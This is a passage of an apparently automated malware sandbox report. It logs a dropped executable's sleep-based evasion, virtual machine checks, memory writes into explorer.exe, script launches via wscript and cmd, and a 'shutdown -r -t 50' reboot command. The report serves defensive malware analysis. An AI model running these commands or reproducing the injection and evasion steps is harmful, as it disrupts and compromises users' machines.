              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99859s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99750s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99640s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99500s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99391s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99281s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99172s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99063s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -197876s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98797s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98686s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98578s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98469s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98359s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98250s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98141s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98031s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -199750s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -199530s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -199312s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -199094s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99429s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99312s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99203s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99094s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98983s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98875s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98765s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98656s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99891s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99781s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99672s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99563s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99438s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99297s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99188s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99047s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98828s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98719s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -98610s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99437s >= -30000sJump to behavior
              Source: C:\Users\Public\Downloads\systems.exe TID: 5356Thread sleep time: -99328s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeWindow / User API: threadDelayed 4824Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeWindow / User API: threadDelayed 4864Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99859Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99750Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99640Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99500Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99391Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99281Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99172Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99063Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98938Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98797Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98686Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98578Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98469Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98359Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98250Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98141Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98031Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99875Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99765Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99656Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99547Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99429Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99312Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99203Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99094Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98983Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98875Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98765Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98656Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99891Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99781Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99672Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99563Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99438Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99297Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99188Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99047Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98828Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98719Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 98610Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99437Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeThread delayed: delay time: 99328Jump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeAPI call chain: ExitProcess graph end nodegraph_1-23738
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: explorer.exe, 0000001E.00000002.817779880.0000000002F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
              Source: explorer.exe, 00000028.00000002.819236140.0000000005B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 0000001E.00000002.820550259.000000000562F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bi#]
              Source: explorer.exe, 0000001B.00000003.496733789.0000000005490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:]>
              Source: C:\Users\Public\Downloads\systems.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1E03A VirtualQuery,GetSystemInfo,1_2_00A1E03A
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A0A7E7 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00A0A7E7
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1BB70 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00A1BB70
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A2ADB8 FindFirstFileExA,1_2_00A2ADB8
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A2780E mov eax, dword ptr fs:[00000030h]1_2_00A2780E
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1F1B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A1F1B5
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A2BAA0 GetProcessHeap,1_2_00A2BAA0
              Source: C:\Users\Public\Downloads\systems.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1F303 SetUnhandledExceptionFilter,1_2_00A1F303
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1F1B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A1F1B5
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1F4CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A1F4CB
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A2898F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A2898F

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: systems.exe.1.dr, ???F?Z?U???X?G?G?Q.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
              Source: systems.exe.1.dr, ?W??SS?JU?WITS?BuSR.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
              Source: 7.2.systems.exe.220000.0.unpack, ???F?Z?U???X?G?G?Q.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
              Source: 7.2.systems.exe.220000.0.unpack, ?W??SS?JU?WITS?BuSR.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
              Source: 7.0.systems.exe.220000.0.unpack, ???F?Z?U???X?G?G?Q.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
              Source: 7.0.systems.exe.220000.0.unpack, ?W??SS?JU?WITS?BuSR.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
              Injects code into the Windows Explorer (explorer.exe)
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6304 base: 32C0000 value: B8Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6304 base: 30E72D8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6304 base: 30E81E8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 160 base: A20000 value: B8Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 160 base: 9082D8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 160 base: 9091E8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6040 base: 2F70000 value: B8Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6040 base: 31762D8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6040 base: 31771E8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6196 base: 30A0000 value: B8Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6196 base: 2E852D8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6196 base: 2E861E8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6496 base: 970000 value: B8Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6496 base: 2F262D8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6496 base: 2F271E8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 2584 base: 150000 value: B8Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 2584 base: 2532D8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 2584 base: 2541E8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6824 base: 4A0000 value: B8Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6824 base: 3C22D8 value: 00Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeMemory written: PID: 6824 base: 3C31E8 value: 00Jump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeProcess created: C:\Users\Public\Downloads\systems.exe "C:\Users\Public\Downloads\systems.exe" Jump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs" Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\vbs.bat" "Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\vbs.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 50Jump to behavior
              Source: systems.exe, 00000007.00000002.818571862.000000000274A000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.819655091.0000000002827000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: systems.exe, 00000007.00000002.818571862.000000000274A000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.821855135.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.819655091.0000000002827000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818255606.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.818473425.000000000273C000.00000004.00000800.00020000.00000000.sdmp, Debug2.txt.7.drBinary or memory string: [ -- Program Manager -- ]
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_00A1A8CC
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Users\Public\Downloads\systems.exe VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
